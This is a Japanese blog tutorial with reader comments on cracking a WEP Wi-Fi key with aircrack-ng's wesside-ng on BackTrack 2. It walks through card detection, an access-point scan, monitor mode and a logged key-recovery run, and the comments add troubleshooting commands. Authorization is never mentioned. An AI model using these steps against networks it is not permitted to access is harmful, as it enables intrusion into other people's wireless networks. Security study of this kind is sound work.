【無線LAN crack】 BackTrack 2 aircrack-ng 1.0-beta1 [Aircrack-ng]
前回の記事で無線LAN crackの事前準備をご紹介しました 
WEPは40ビットor104ビットのWEPキーと24ビットのIVでキーストリームを生成・通信暗号化を行いますが、IVは平文で送信されるため、IVを大量に採集することでWEPキーの推測が可能です
aircrack-ng 1.0-beta1からwesside-ngコマンドが追加されています
Wesside-ng is an auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key in minutes.
1)無線LANカードの認識を確認する。
bt ~ # lspci
00:00.0 Host bridge: Intel Corporation 82440MX Host Bridge (rev 01)
(途中略)
00:0c.0 Ethernet controller: Atheros Communications, Inc. AR5212 802.11abg NIC (rev 01) 
2)アクセスポイントを確認する。
bt ~ # ifconfig wifi0 up
bt ~ # ifconfig ath0 up
bt ~ # iwlist ath0 scan
ath0 Scan completed :
Cell 01 - Address: 00:0D:02:4E:XX:XX
ESSID:"JUPITER"
Mode:Master
Frequency:2.447 GHz (Channel 8)
Quality=39/94 Signal level=-56 dBm Noise level=-95 dBm
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
48 Mb/s; 54 Mb/s
Extra:bcn_int=100
3)ath0をmonitorモードにする。(atherosチップの場合) 
bt ~ # wlanconfig ath0 destroy
bt ~ # wlanconfig ath0 create wlandev wifi0 wlanmode monitor
bt ~ # iwconfig ath0
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-91 dBm Noise level=-91 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
4)wesside-ngでWEPキーをcrackする。
bt ~ # wesside-ng -i ath0
[22:40:49] Using mac 00:11:F5:E2:XX:XX
[22:40:49] WARNING: Appending in wep.cap
[22:40:49] WARNING: reading prga from prga.log
[22:40:49] Got 16 bytes of prga IV=(2a:ac:84) PRGA=2A 62 5B 80 DE DA C1 9B E7 D1 AF 9C A8 3E 90 81
[22:40:49] Looking for a victim...
[22:40:51] Found SSID(JUPITER) BSS=(00:0D:02:4E:XX:XX) chan=8
[22:40:51] Authenticated
[22:40:51] Associated (ID=6)
[22:42:42] Got ARP request from (00:1A:73:8B:XX:XX)
[23:00:17] Guessing PRGA 5a (IP byte=188)
[23:00:17] Starting crack PID=9256
[23:00:44] Guessing PRGA 5a (IP byte=188)
[23:00:44] Crack unsuccessful
[23:01:16] Guessing PRGA 5a (IP byte=188)
[23:01:17] Stopping crack PID=9256
[23:15:39] Guessing PRGA 5a (IP byte=188)
[23:15:39] Starting crack PID=13847
[23:16:08] Guessing PRGA 5a (IP byte=188)
[23:16:08] Crack unsuccessful
[23:16:10] Guessing PRGA 5a (IP byte=188)
[23:16:10] Warning... previous crack still running!
[23:16:10] Stopping crack PID=13847
[23:16:10] Starting crack PID=14004
[23:16:35] Guessing PRGA 5a (IP byte=188)
Key: XX:XX:XX:XX:XX
[23:16:35] KEY=(XX:XX:XX:XX:XX)
Owned in 35.77 minutes
[23:16:35] Dying...
[23:16:35] Stopping crack PID=14004
[23:16:35] KEY=(XX:XX:XX:XX:XX)
Owned in 35.77 minutes
[23:16:35] Dying...
5)その他特記事項
アクセスポイント WARPSTAR-BaseStation-A48355
WEPキーは40bit
パソコン IBM Thinkpad i series S30 PeniumⅢ 600Mhz
無線LANカード 富士通WLL-4030-D50(miniPCI)
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
と仰った通りにコマンドを入力させてもらったのですが、確かめるとなぜかmodeがManagedからMonitorに変わりません。
何か理由は考えられないでしょうか?
by 初心者 (2008-10-27 23:37)
無線LANカードorアダプタがatherosのチップなら
airmon-ng stop ath0
airmon-ng start wifi0
としてみてください。以下の様になると思います。
bt aircrack-ng # airmon-ng stop ath0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
bt aircrack-ng # airmon-ng start wifi0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
by atc-500 (2008-10-28 23:06)
こんにちは。
今回、VMware playerでホストVista、ゲストBackTrack 3で試してみたのですが、そもそも無線のデバイス自体が認識されていないようなのです。
前にUbuntuでAircrack-ngを試したのですが、結局できませんでした。
どうしたら良いのでしょうか。
ご教示お願いします。
by Eagle (2009-03-08 19:22)